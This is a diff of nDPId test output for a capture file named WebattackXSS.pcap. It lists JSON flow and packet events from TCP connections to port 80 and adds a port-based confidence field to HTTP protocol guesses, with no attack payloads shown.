 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":353,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347565457,"flow_last_seen":1499347570771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58550,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":354,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347566719,"flow_last_seen":1499347571771,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":355,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347569321,"flow_last_seen":1499347574772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58590,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":356,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347570571,"flow_last_seen":1499347575772,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58604,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":357,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347573065,"flow_last_seen":1499347578774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58630,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6124,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":358,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347574366,"flow_last_seen":1499347579775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699493,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58650,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347699724,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347699724,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59988,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6127,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":433,"flow_packet_id":1,"flow_last_seen":1499347699724,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347699724,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U2NAAD4Gcm2sEAABwKgKMupUAFDv6uGsAAAAAKACchDuvAAAAgQFtAQCCAoBO7LPAAAAAAEDAwc="}
@@ -2468,29 +2468,29 @@
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6202,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":1,"flow_last_seen":1499347709252,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347709252,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8u61AAD4GCiOsEAABwKgKMuq0AFAeNwewAAAAAKACchCQvwAAAgQFtAQCCAoBO7wdAAAAAAEDAwc="}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6203,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":2,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1499347709253,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ6rSwITsWHjcHsaAScSAU7wAAAgQFtAQCCAoD5Y2SATu8HQEDAwc="}
 00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6204,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":438,"flow_packet_id":3,"flow_last_seen":1499347709253,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1499347709253,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0u65AAD4GCiqsEAABwKgKMuq0AFAeNwexsCE7F4AQAOWz9QAAAQEICgE7vB4D5Y2S"}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":359,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347575652,"flow_last_seen":1499347580775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58664,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":360,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347578164,"flow_last_seen":1499347583775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58690,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":361,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347579405,"flow_last_seen":1499347584775,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58704,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":362,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347580693,"flow_last_seen":1499347585776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58718,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":363,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347583209,"flow_last_seen":1499347588776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58744,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":364,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347584472,"flow_last_seen":1499347589778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58758,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":365,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347585744,"flow_last_seen":1499347590777,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00614{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}}
 00575{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6208,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":366,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347588270,"flow_last_seen":1499347593778,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1499347710555,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":58798,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
